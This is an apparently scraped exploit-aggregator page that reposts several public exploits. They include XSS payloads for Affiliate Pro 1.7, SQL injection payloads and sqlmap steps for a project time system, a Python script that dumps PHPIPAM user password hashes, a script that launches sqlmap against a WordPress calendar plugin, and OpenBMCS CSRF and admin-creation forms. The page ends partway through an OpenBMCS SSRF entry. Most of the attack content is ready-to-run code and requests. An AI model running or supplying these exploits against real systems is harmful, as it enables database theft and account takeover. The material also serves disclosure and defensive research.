vulnerability-lab.com/rss/rss_news.php Programs: vulnerability-lab.com/submit.php vulnerability-lab.com/register.php vulnerability-lab.com/list-of-bug-bounty-programs.php Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list, modify, use or edit our material contact (admin@ or research@) to get a ask permission. Copyright © 2021 | Vulnerability Laboratory - [Evolution Security GmbH]™ -- VULNERABILITY LABORATORY (VULNERABILITY LAB) RESEARCH, BUG BOUNTY & RESPONSIBLE DISCLOSURE
HireHackking

Affiliate Pro 1.7 - 'Multiple' Cross Site Scripting (XSS)

HACKER · %s · %s

# Exploit Title: Affiliate Pro 1.7 - 'Multiple' Cross Site Scripting (XSS) # Exploit Author: Vulnerability-Lab # Date: 05/01/2022 Document Title: =============== Affiliate Pro v1.7 - Multiple Cross Site Vulnerabilities References (Source): ==================== https://www.vulnerability-lab.com/get_content.php?id=2281 Release Date: ============= 2022-01-05 Vulnerability Laboratory ID (VL-ID): ==================================== 2281 Common Vulnerability Scoring System: ==================================== 5.1 Vulnerability Class: ==================== Cross Site Scripting - Non Persistent Current Estimated Price: ======================== 500€ - 1.000€ Product & Service Introduction: =============================== Affiliate Pro is a Powerful and yet simple to use PHP affiliate Management System for your new or existing website. Let affiliates sell your products, bring you traffic or even leads and reward them with a commission. More importantly, use Affiliate Pro to track it intelligently to keep your affiliates happy and also your bottom line! So how does it work? It is pretty simple, when a user visits your website through an affiliate URL the responsible affiliate sending the traffic to you will receive a commission based on your settings. (Copy of the Homepage:https://jdwebdesigner.com/ &https://codecanyon.net/item/affiliate-pro-affiliate-management-system/12908496 ) Abstract Advisory Information: ============================== The vulnerability laboratory core research team discovered multiple reflected cross site scripting web vulnerabilities in the Affiliate Pro - Affiliate Management System v1.7. Affected Product(s): ==================== jdwebdesigner Product: Affiliate Pro v1.7 - Affiliate Management System (PHP) (Web-Application) Vulnerability Disclosure Timeline: ================================== 2021-08-22: Researcher Notification & Coordination (Security Researcher) 2021-08-23: Vendor Notification (Security Department) 2021-08-30: Vendor Response/Feedback (Security Department) 2021-**-**: Vendor Fix/Patch (Service Developer Team) 2021-**-**: Security Acknowledgements (Security Department) 2022-01-05: Public Disclosure (Vulnerability Laboratory) Discovery Status: ================= Published Exploitation Technique: ======================= Remote Severity Level: =============== Medium Authentication Type: ==================== Restricted Authentication (Guest Privileges) User Interaction: ================= Low User Interaction Disclosure Type: ================ Responsible Disclosure Technical Details & Description: ================================ Multiple reflected cross site scripting web vulnerabilities has been discovered in the Affiliate Pro - Affiliate Management System v1.7. The vulnerability allows remote attackers to inject own malicious script codes with non-persistent attack vector to compromise client-site browser to web-application requests. The non-persistent cross site scripting web vulnerabilities are located in the `email`,`username` and `fullname` parameters of the `index` module. Attackers are able to inject own malicious script code to the `Fullname`,`Username` or `Email` input fields to manipulate client-side requests. The request method to inject is post and the attack vector is non-persistent (reflected) on client-side. The injection- and execution points are located in the index formular for affiliates to enter. Successful exploitation of the vulnerabilities results in session hijacking, non-persistent phishing attacks, non-persistent external redirects to malicious source and non-persistent manipulation of affected application modules. Request Method(s): [+] POST Vulnerable Module(s): [+] index Vulnerable Input(s): [+] Email [+] Username [+] Fullname Vulnerable Parameter(s): [+] email [+] username [+] fullname Proof of Concept (PoC): ======================= The client-side cross site scripting web vulnerability can be exploited by remote attackers without account and with low or medium user interaction. For security demonstration or to reproduce the cross site scripting web vulnerability follow the provided information and steps below to continue. Exploitation: Payload <iframe src="javascript:alert(1337)"></iframe> %3cscript%3ealert(1337)%3c%2fscript%3 --- PoC Session Logs (POST) --- POST /affiliate-pro-demo/index HTTP/1.1 Host: affiliates-pro.localhost:8000 Origin:http://affiliates-pro.localhost:8000 Cookie: session_id=92b8a43b5bdf5d1c54999bfbcf702f24 Referer:http://affiliates-pro.localhost:8000/affiliate-pro-demo/ Content-Type: application/x-www-form-urlencoded Accept-Encoding: gzip, deflate Accept: */* - fullname=<iframe src="javascript:alert(1337)"></iframe> &username=<iframe src="javascript:alert(1337)"></iframe>@pwnd.coml00fp%22%3e%3cscript%3ealert(1337)%3c%2fscript%3ewkgzv &p=test&confirmpwd=j2B%21p5o%21K8 - HTTP/1.1 200 OK Server: Apache Set-Cookie: session_id=92b8a43b5bdf5d1c54999bfbcf702f24; path=/; HttpOnly Connection: Upgrade, close Vary: Accept-Encoding Content-Length: 6549 Content-Type: text/html; charset=UTF-8 Vulnerable Source: Index <div class="control-group"> <label class="control-label" for="fullname">Full Name</label> <div class="controls"> <input id="textinput" name="fullname" type="text" placeholder="Full Name" class="input-xlarge" value="<iframe src="javascript:alert(1337)"></iframe>" required="required"> </div> </div> <div class="control-group"> <label class="control-label" for="username">Username</label> <div class="controls"> <input id="textinput" name="username" type="text" placeholder="username" class="input-xlarge" value="<iframe src="javascript:alert(1337)"></iframe>" required> </div> </div> <div class="control-group"> <label class="control-label" for="email">E-Mail Address</label> <div class="controls"> <input id="textinput" name="email" type="email" placeholder="test@provider.com" class="input-xlarge" value="<iframe src="javascript:alert(1337)"></iframe>" required> </div> Security Risk: ============== The security risk of the client-side cross site scripting vulnerabilities in the web-application are estimated as medium. Credits & Authors: ================== Vulnerability-Lab [Research Team] -https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab Disclaimer & Information: ========================= The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data. Domains:www.vulnerability-lab.com www.vuln-lab.com www.vulnerability-db.com Services: magazine.vulnerability-lab.com paste.vulnerability-db.com infosec.vulnerability-db.com Social: twitter.com/vuln_lab facebook.com/VulnerabilityLab youtube.com/user/vulnerability0lab Feeds: vulnerability-lab.com/rss/rss.php vulnerability-lab.com/rss/rss_upcoming.php vulnerability-lab.com/rss/rss_news.php Programs: vulnerability-lab.com/submit.php vulnerability-lab.com/register.php vulnerability-lab.com/list-of-bug-bounty-programs.php Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list, modify, use or edit our material contact (admin@ or research@) to get a ask permission. Copyright © 2022 | Vulnerability Laboratory - [Evolution Security GmbH]™ -- VULNERABILITY LABORATORY (VULNERABILITY LAB) RESEARCH, BUG BOUNTY & RESPONSIBLE DISCLOSURE
HireHackking

Online Project Time Management System 1.0 - SQLi (Authenticated)

HACKER · %s · %s

# Exploit Title: Online Project Time Management System 1.0 - SQLi (Authenticated) # Date: 19/01/2022 # Exploit Author: Felipe Alcantara (Filiplain) # Vendor Homepage: https://www.sourcecodester.com/ # Software Link: https://www.sourcecodester.com/php/15136/online-project-time-management-system-phpoop-free-source-code.html # Version: 1.0 # Tested on: Kali Linux # Steps to reproduce # Log in as an employee # Go to : http://localhost/ptms/?page=user # Click Update # Save request in BurpSuite # Run saved request with sqlmap: sqlmap -r request.txt --batch --risk 3 --level 3 --dump ========================== POST /ptms/classes/Users.php?f=save_employee HTTP/1.1 Host: localhost Content-Length: 1362 Accept: application/json, text/javascript, */*; q=0.01 X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) Content-Type: multipart/form-data; boundary=----WebKitFormBoundary39q8yel1pdwYRLNz Origin: http://localhost Referer: http://localhost/ptms/?page=user Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: PHPSESSID=r9ds0ep1v3q2lom422v9e2vcfm Connection: close ------WebKitFormBoundary39q8yel1pdwYRLNz Content-Disposition: form-data; name="id" 4' AND (SELECT 1 FROM (SELECT(SLEEP(4)))test)-- test ------WebKitFormBoundary39q8yel1pdwYRLNz Content-Disposition: form-data; name="code" 2022-0003 ------WebKitFormBoundary39q8yel1pdwYRLNz Content-Disposition: form-data; name="generated_password" ------WebKitFormBoundary39q8yel1pdwYRLNz Content-Disposition: form-data; name="firstname" Mark 2223 ------WebKitFormBoundary39q8yel1pdwYRLNz Content-Disposition: form-data; name="middlename" Z ------WebKitFormBoundary39q8yel1pdwYRLNz Content-Disposition: form-data; name="lastname" Cooper ------WebKitFormBoundary39q8yel1pdwYRLNz Content-Disposition: form-data; name="gender" Male ------WebKitFormBoundary39q8yel1pdwYRLNz Content-Disposition: form-data; name="department" IT Department ------WebKitFormBoundary39q8yel1pdwYRLNz Content-Disposition: form-data; name="position" Department Manager ------WebKitFormBoundary39q8yel1pdwYRLNz Content-Disposition: form-data; name="email" mcooper@sample.com ------WebKitFormBoundary39q8yel1pdwYRLNz Content-Disposition: form-data; name="password" ------WebKitFormBoundary39q8yel1pdwYRLNz Content-Disposition: form-data; name="img"; filename="" Content-Type: application/octet-stream ------WebKitFormBoundary39q8yel1pdwYRLNz-- ========================== #Payloads #++++++++++++ #Payload: (Boolean-Based Blind) #------WebKitFormBoundary39q8yel1pdwYRLNz #Content-Disposition: form-data; name="id" #4' or 1=1 -- #-------- #Payload: (time-based blind) #------WebKitFormBoundary39q8yel1pdwYRLNz #Content-Disposition: form-data; name="id" #4' AND (SELECT 1 FROM (SELECT(SLEEP(4)))test)-- test #-------
HireHackking

PHPIPAM 1.4.4 - SQLi (Authenticated)

HACKER · %s · %s

# Exploit Title: PHPIPAM 1.4.4 - SQLi (Authenticated) # Google Dork: [if applicable] # Date: 20/01/2022 # Exploit Author: Rodolfo "Inc0gbyt3" Tavares # Vendor Homepage: https://github.com/phpipam/phpipam # Software Link: https://github.com/phpipam/phpipam # Version: 1.4.4 # Tested on: Linux/Windows # CVE : CVE-2022-23046 import requests import sys import argparse ################ """ Author of exploit: Rodolfo 'Inc0gbyt3' Tavares CVE: CVE-2022-23046 Type: SQL Injection Usage: $ python3 -m pip install requests $ python3 exploit.py -u http://localhost:8082 -U <admin> -P <password> """ ############### __author__ = "Inc0gbyt3" menu = argparse.ArgumentParser(description="[+] Exploit for PHPIPAM Version: 1.4.4 Authenticated SQL Injection\n CVE-2022-23046") menu.add_argument("-u", "--url", help="[+] URL of target, example: https://phpipam.target.com", type=str) menu.add_argument("-U", "--user", help="[+] Username", type=str) menu.add_argument("-P", "--password", help="[+] Password", type=str) args = menu.parse_args() if len(sys.argv) < 3: menu.print_help() target = args.url user = args.user password = args.password def get_token(): u = f"{target}/app/login/login_check.php" try: r = requests.post(u, verify=False, timeout=10, headers={"User-Agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36", "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8"}, data={"ipamusername":user, "ipampassword":password}) headers = r.headers['Set-Cookie'] headers_string = headers.split(';') for s in headers_string: if "phpipam" in s and "," in s: # double same cookie Check LoL cookie = s.strip(',').lstrip() return cookie except Exception as e: print(f"[+] {e}") def exploit_sqli(): cookie = get_token() xpl = f"{target}/app/admin/routing/edit-bgp-mapping-search.php" data = { "subnet":'pwn"union select(select concat(@:=0x3a,(select+count(*) from(users)where(@:=concat(@,email,0x3a,password,"0x3a",2fa))),@)),2,3,user() -- -', # dios query dump all :) "bgp_id":1 } headers = { "User-Agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36", "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8", "Cookie": cookie } try: r = requests.post(xpl, verify=False, timeout=10, headers=headers, data=data) if "admin" in r.text or "rounds" in r.text: print("[+] Vulnerable..\n\n") print(f"> Users and hash passwords: \n\n{r.text}") print("\n\n> DONE <") except Exception as e: print(f"[-] {e}") if __name__ == '__main__': exploit_sqli()
HireHackking
# Exploit Title: WordPress Plugin Modern Events Calendar V 6.1 - SQL Injection (Unauthenticated) # Date 26.01.2022 # Exploit Author: Ron Jost (Hacker5preme) # Vendor Homepage: https://webnus.net/modern-events-calendar/ # Software Link: https://downloads.wordpress.org/plugin/modern-events-calendar-lite.6.1.0.zip # Version: <= 6.1 # Tested on: Ubuntu 20.04 # CVE: CVE-2021-24946 # CWE: CWE-89 # Documentation: https://github.com/Hacker5preme/Exploits/blob/main/Wordpress/CVE-2021-24946/README.md ''' Description: The Modern Events Calendar Lite WordPress plugin before 6.1.5 does not sanitise and escape the time parameter before using it in a SQL statement in the mec_load_single_page AJAX action, available to unauthenticated users, leading to an unauthenticated SQL injection issue ''' #Banner: banner = ''' .oOOOo. o 'O o.OOoOoo .O o O o O .oOOo. .oOOo. .oOOo. oO .oOOo. o O .oOOo. o O .oOOo. o o O o O O o O O O O o O o O o O o o o ooOO o o O o o o o o o O o o o o O O' O ooooooooo O' o o O' O ooooooooo O' OooOOo `OooOo OooOOo OoOOo. O `o o o O O O O o O O O O O O `o .o `o O O .O o O .O O .O o o o O o `OoooO' `o' ooOooOoO oOoOoO `OooO' oOoOoO OooOO oOoOoO O `OooO' O `OooO' [+] Modern Events Calendar Lite SQL-Injection [@] Developed by Ron Jost (Hacker5preme) ''' print(banner) import requests import argparse from datetime import datetime import os # User-Input: my_parser = argparse.ArgumentParser(description='Wordpress Plugin Modern Events Calendar SQL-Injection (unauthenticated)') my_parser.add_argument('-T', '--IP', type=str) my_parser.add_argument('-P', '--PORT', type=str) my_parser.add_argument('-U', '--PATH', type=str) args = my_parser.parse_args() target_ip = args.IP target_port = args.PORT wp_path = args.PATH # Exploit: print('[*] Starting Exploit at: ' + str(datetime.now().strftime('%H:%M:%S'))) print('[*] Payload for SQL-Injection:') exploitcode_url = r'sqlmap "http://' + target_ip + ':' + target_port + wp_path + r'wp-admin/admin-ajax.php?action=mec_load_single_page&time=2" ' exploitcode_risk = ' -p time' print(' Sqlmap options:') print(' -a, --all Retrieve everything') print(' -b, --banner Retrieve DBMS banner') print(' --current-user Retrieve DBMS current user') print(' --current-db Retrieve DBMS current database') print(' --passwords Enumerate DBMS users password hashes') print(' --tables Enumerate DBMS database tables') print(' --columns Enumerate DBMS database table column') print(' --schema Enumerate DBMS schema') print(' --dump Dump DBMS database table entries') print(' --dump-all Dump all DBMS databases tables entries') retrieve_mode = input('Which sqlmap option should be used to retrieve your information? ') exploitcode = exploitcode_url + retrieve_mode + exploitcode_risk os.system(exploitcode) print('Exploit finished at: ' + str(datetime.now().strftime('%H:%M:%S')))
HireHackking

OpenBMCS 2.4 - Cross Site Request Forgery (CSRF)

HACKER · %s · %s

# Exploit Title: OpenBMCS 2.4 - Cross Site Request Forgery (CSRF) # Exploit Author: LiquidWorm # Date: 26/10/2021 OpenBMCS 2.4 CSRF Send E-mail Vendor: OPEN BMCS Product web page: https://www.openbmcs.com Affected version: 2.4 Summary: Building Management & Controls System (BMCS). No matter what the size of your business, the OpenBMCS software has the ability to expand to hundreds of controllers. Our product can control and monitor anything from a garage door to a complete campus wide network, with everything you need on board. Desc: The application interface allows users to perform certain actions via HTTP requests without performing any validity checks to verify the requests. This can be exploited to perform certain actions with administrative privileges if a logged-in user visits a malicious web site. Tested on: Linux Ubuntu 5.4.0-65-generic (x86_64) Linux Debian 4.9.0-13-686-pae/4.9.228-1 (i686) Apache/2.4.41 (Ubuntu) Apache/2.4.25 (Debian) nginx/1.16.1 PHP/7.4.3 PHP/7.0.33-0+deb9u9 Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2022-5691 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5691.php 26.10.2021 -- <html> <body> <form action="https://192.168.1.222/core/sendFeedback.php" method="POST"> <input type="hidden" name="subject" value="FEEDBACK%20TESTINGUS" /> <input type="hidden" name="message" value="Take me to your leader." /> <input type="hidden" name="email" value="lab@zeroscience.mk" /> <input type="submit" value="Send" /> </form> </body> </html>
HireHackking

OpenBMCS 2.4 - Create Admin / Remote Privilege Escalation

HACKER · %s · %s

# Exploit Title: OpenBMCS 2.4 - Create Admin / Remote Privilege Escalation # Exploit Author: LiquidWorm # Date: 26/10/2021 OpenBMCS 2.4 Create Admin / Remote Privilege Escalation Vendor: OPEN BMCS Product web page: https://www.openbmcs.com Affected version: 2.4 Summary: Building Management & Controls System (BMCS). No matter what the size of your business, the OpenBMCS software has the ability to expand to hundreds of controllers. Our product can control and monitor anything from a garage door to a complete campus wide network, with everything you need on board. Desc: The application suffers from an insecure permissions and privilege escalation vulnerability. A regular user can create administrative users and/or elevate her privileges by sending an HTTP POST request to specific PHP scripts in '/plugins/useradmin/' directory. Tested on: Linux Ubuntu 5.4.0-65-generic (x86_64) Linux Debian 4.9.0-13-686-pae/4.9.228-1 (i686) Apache/2.4.41 (Ubuntu) Apache/2.4.25 (Debian) nginx/1.16.1 PHP/7.4.3 PHP/7.0.33-0+deb9u9 Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2022-5693 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5693.php 26.10.2021 -- List current ID and permissions (read): --------------------------------------- POST /plugins/useradmin/getUserDetails.php HTTP/1.1 Host: 192.168.1.222 Cookie: PHPSESSID=ecr4lvcqvkdae4eimf3ktqeqn4 Content-Length: 16 Sec-Ch-Ua: "Chromium";v="95", ";Not A Brand";v="99" Accept: */* Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Sec-Ch-Ua-Mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.54 Safari/537.36 Sec-Ch-Ua-Platform: "Windows" Origin: https://192.168.1.222 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: https://192.168.1.222/index.php Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Connection: close id_list%5B%5D=17 HTTP/1.1 200 OK Date: Tue, 16 Nov 2021 20:56:53 GMT Server: Apache/2.4.41 (Ubuntu) Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Vary: Accept-Encoding Content-Length: 692 Connection: close Content-Type: text/html; charset=UTF-8 [{"user_id":"17","username":"testingus","email":"","expiry_date":null,"fullname":"test","phone":"","module_id":"useradmin","usermodule_permission":"1","permissions":[{"user_id":"17","module_id":"alarms","permissions":"1","mod_home":"1"},{"user_id":"17","module_id":"controllers","permissions":"1","mod_home":"1"},{"user_id":"17","module_id":"core","permissions":"0","mod_home":"0"},{"user_id":"17","module_id":"graphics","permissions":"1","mod_home":"1"},{"user_id":"17","module_id":"history","permissions":"1","mod_home":"1"},{"user_id":"17","module_id":"progtool","permissions":"1","mod_home":"0"},{"user_id":"17","module_id":"useradmin","permissions":"1","mod_home":"0"}],"human-date":""}] List current ID and permissions (admin): ---------------------------------------- POST /plugins/useradmin/getUserDetails.php HTTP/1.1 Host: 192.168.1.222 Cookie: PHPSESSID=ecr4lvcqvkdae4eimf3ktqeqn4 Content-Length: 16 Sec-Ch-Ua: "Chromium";v="95", ";Not A Brand";v="99" Accept: */* Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Sec-Ch-Ua-Mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.54 Safari/537.36 Sec-Ch-Ua-Platform: "Windows" Origin: https://192.168.1.222 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: https://192.168.1.222/index.php Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Connection: close id_list%5B%5D=18 HTTP/1.1 200 OK Date: Tue, 16 Nov 2021 20:56:36 GMT Server: Apache/2.4.41 (Ubuntu) Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Vary: Accept-Encoding Content-Length: 725 Connection: close Content-Type: text/html; charset=UTF-8 [{"user_id":"18","username":"testingus2","email":"testingus@test.tld","expiry_date":null,"fullname":"TestName","phone":"1112223333","module_id":"useradmin","usermodule_permission":"4","permissions":[{"user_id":"18","module_id":"alarms","permissions":"3","mod_home":"1"},{"user_id":"18","module_id":"controllers","permissions":"2","mod_home":"1"},{"user_id":"18","module_id":"core","permissions":"1","mod_home":"0"},{"user_id":"18","module_id":"graphics","permissions":"4","mod_home":"1"},{"user_id":"18","module_id":"history","permissions":"3","mod_home":"1"},{"user_id":"18","module_id":"progtool","permissions":"3","mod_home":"0"},{"user_id":"18","module_id":"useradmin","permissions":"4","mod_home":"0"}],"human-date":""}] Escalate privileges: -------------------- POST /plugins/useradmin/update_user_permissions.php HTTP/1.1 Host: 192.168.1.222 Cookie: PHPSESSID=ecr4lvcqvkdae4eimf3ktqeqn4 Content-Length: 702 Sec-Ch-Ua: "Chromium";v="95", ";Not A Brand";v="99" Accept: */* Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Sec-Ch-Ua-Mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.54 Safari/537.36 Sec-Ch-Ua-Platform: "Windows" Origin: https://192.168.1.222 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: https://192.168.1.222/index.php Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Connection: close permissions%5B0%5D%5Bpermissions%5D=3&permissions%5B0%5D%5BmoduleID%5D=alarms&permissions%5B0%5D%5Bmod_home%5D=1&permissions%5B1%5D%5Bpermissions%5D=2&permissions%5B1%5D%5BmoduleID%5D=controllers&permissions%5B1%5D%5Bmod_home%5D=1&permissions%5B2%5D%5Bpermissions%5D=1&permissions%5B2%5D%5BmoduleID%5D=core&permissions%5B3%5D%5Bpermissions%5D=4&permissions%5B3%5D%5BmoduleID%5D=graphics&permissions%5B3%5D%5Bmod_home%5D=1&permissions%5B4%5D%5Bpermissions%5D=3&permissions%5B4%5D%5BmoduleID%5D=history&permissions%5B4%5D%5Bmod_home%5D=1&permissions%5B5%5D%5Bpermissions%5D=3&permissions%5B5%5D%5BmoduleID%5D=progtool&permissions%5B6%5D%5Bpermissions%5D=4&permissions%5B6%5D%5BmoduleID%5D=useradmin&id=17 HTTP/1.1 200 OK Date: Tue, 16 Nov 2021 20:58:48 GMT Server: Apache/2.4.41 (Ubuntu) Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Content-Length: 1 Connection: close Content-Type: text/html; charset=UTF-8 2 Create admin from read user: ---------------------------- POST /plugins/useradmin/create_user.php HTTP/1.1 Host: 192.168.1.222 Cookie: PHPSESSID=ecr4lvcqvkdae4eimf3ktqeqn4 Content-Length: 1010 Sec-Ch-Ua: "Chromium";v="95", ";Not A Brand";v="99" Accept: */* Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Sec-Ch-Ua-Mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.54 Safari/537.36 Sec-Ch-Ua-Platform: "Windows" Origin: https://192.168.1.222 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: https://192.168.1.222/index.php Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Connection: close user%5Busername%5D=testingus2&user%5Bfullname%5D=TestName&user%5Bphone%5D=1112223333&user%5Bpassword%5D=Password123&user%5BpasswordConfirm%5D=Password123&user%5Bemail%5D=testingus%40test.tld&user%5Bexpiry%5D=&permissions%5B0%5D%5BmoduleID%5D=alarms&permissions%5B0%5D%5Bpermissions%5D=3&permissions%5B0%5D%5Bmod_home%5D=1&permissions%5B1%5D%5BmoduleID%5D=controllers&permissions%5B1%5D%5Bpermissions%5D=2&permissions%5B1%5D%5Bmod_home%5D=1&permissions%5B2%5D%5BmoduleID%5D=core&permissions%5B2%5D%5Bpermissions%5D=1&permissions%5B2%5D%5Bmod_home%5D=0&permissions%5B3%5D%5BmoduleID%5D=graphics&permissions%5B3%5D%5Bpermissions%5D=4&permissions%5B3%5D%5Bmod_home%5D=1&permissions%5B4%5D%5BmoduleID%5D=history&permissions%5B4%5D%5Bpermissions%5D=3&permissions%5B4%5D%5Bmod_home%5D=1&permissions%5B5%5D%5BmoduleID%5D=progtool&permissions%5B5%5D%5Bpermissions%5D=3&permissions%5B5%5D%5Bmod_home%5D=0&permissions%5B6%5D%5BmoduleID%5D=useradmin&permissions%5B6%5D%5Bpermissions%5D=4&permissions%5B6%5D%5Bmod_home%5D=0 HTTP/1.1 200 OK Date: Tue, 16 Nov 2021 20:18:58 GMT Server: Apache/2.4.41 (Ubuntu) Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Content-Length: 20 Connection: close Content-Type: text/html; charset=UTF-8 {"status":"success"} PoC escalate from editor to admin: ---------------------------------- <html> <body> <form action="https://192.168.1.222/plugins/useradmin/update_user_permissions.php" method="POST"> <input type="hidden" name="permissions[0][permissions]" value="3" /> <input type="hidden" name="permissions[0][moduleID]" value="alarms" /> <input type="hidden" name="permissions[0][mod_home]" value="1" /> <input type="hidden" name="permissions[1][permissions]" value="2" /> <input type="hidden" name="permissions[1][moduleID]" value="controllers" /> <input type="hidden" name="permissions[1][mod_home]" value="1" /> <input type="hidden" name="permissions[2][permissions]" value="1" /> <input type="hidden" name="permissions[2][moduleID]" value="core" /> <input type="hidden" name="permissions[3][permissions]" value="4" /> <input type="hidden" name="permissions[3][moduleID]" value="graphics" /> <input type="hidden" name="permissions[3][mod_home]" value="1" /> <input type="hidden" name="permissions[4][permissions]" value="3" /> <input type="hidden" name="permissions[4][moduleID]" value="history" /> <input type="hidden" name="permissions[4][mod_home]" value="1" /> <input type="hidden" name="permissions[5][permissions]" value="3" /> <input type="hidden" name="permissions[5][moduleID]" value="progtool" /> <input type="hidden" name="permissions[6][permissions]" value="4" /> <input type="hidden" name="permissions[6][moduleID]" value="useradmin" /> <input type="hidden" name="id" value="17" /> <input type="submit" value="Esc" /> </form> </body> </html> PoC create admin from editor: ----------------------------- <html> <body> <form action="https://192.168.1.222/plugins/useradmin/create_user.php" method="POST"> <input type="hidden" name="user[username]" value="testingus2" /> <input type="hidden" name="user[fullname]" value="TestName" /> <input type="hidden" name="user[phone]" value="1112223333" /> <input type="hidden" name="user[password]" value="Password123" /> <input type="hidden" name="user[passwordConfirm]" value="Password123" /> <input type="hidden" name="user[email]" value="testingus@test.tld" /> <input type="hidden" name="user[expiry]" value="" /> <input type="hidden" name="permissions[0][moduleID]" value="alarms" /> <input type="hidden" name="permissions[0][permissions]" value="3" /> <input type="hidden" name="permissions[0][mod_home]" value="1" /> <input type="hidden" name="permissions[1][moduleID]" value="controllers" /> <input type="hidden" name="permissions[1][permissions]" value="2" /> <input type="hidden" name="permissions[1][mod_home]" value="1" /> <input type="hidden" name="permissions[2][moduleID]" value="core" /> <input type="hidden" name="permissions[2][permissions]" value="1" /> <input type="hidden" name="permissions[2][mod_home]" value="0" /> <input type="hidden" name="permissions[3][moduleID]" value="graphics" /> <input type="hidden" name="permissions[3][permissions]" value="4" /> <input type="hidden" name="permissions[3][mod_home]" value="1" /> <input type="hidden" name="permissions[4][moduleID]" value="history" /> <input type="hidden" name="permissions[4][permissions]" value="3" /> <input type="hidden" name="permissions[4][mod_home]" value="1" /> <input type="hidden" name="permissions[5][moduleID]" value="progtool" /> <input type="hidden" name="permissions[5][permissions]" value="3" /> <input type="hidden" name="permissions[5][mod_home]" value="0" /> <input type="hidden" name="permissions[6][moduleID]" value="useradmin" /> <input type="hidden" name="permissions[6][permissions]" value="4" /> <input type="hidden" name="permissions[6][mod_home]" value="0" /> <input type="submit" value="Cre" /> </form> </body> </html>
HireHackking
# Exploit Title: OpenBMCS 2.4 - Server Side Request Forgery (SSRF) (Unauthenticated) # Exploit Author: LiquidWorm # Date: 26/10/2021 OpenBMCS 2.4 Unauthenticated SSRF / RFI Vendor: OPEN BMCS Product web page: https://www.openbmcs.com Affected version: 2.4 Summary: Building Management & Controls System (BMCS). No matter what the size of your business, the OpenBMCS software has the ability to expand to hundreds of controllers. Our product can control and monitor anything from a garage door to a complete campus wide network, with everything you need on board. Desc: Unauthenticated Server-Side Request Forgery (SSRF) and Remote File Include (RFI) vulnerability exists in OpenBMCS within its functionalities. The application parses user supplied data in the POST parameter 'ip' to query a server IP on port 81 by default. Since no validation is carried out on the parameter, an attacker can specify an external domain and force the application to make an HTTP request to an arbitrary destination host. This can be used by an external attacker for example to bypass firewalls and initiate a service and network enumeration on the internal network through the affected application, allows hijacking the current session of the user, execute cross-site scripting code or changing the look of the page and content modification on current display. Tested on: Linux Ubuntu 5.4.0-65-generic (x86_64) Linux Debian 4.9.0-13-686-pae/4.9.228-1 (i686) Apache/2.4.41 (Ubuntu) Apache/2.4.25 (Debian) nginx/1.16.1 PHP/7.4.3 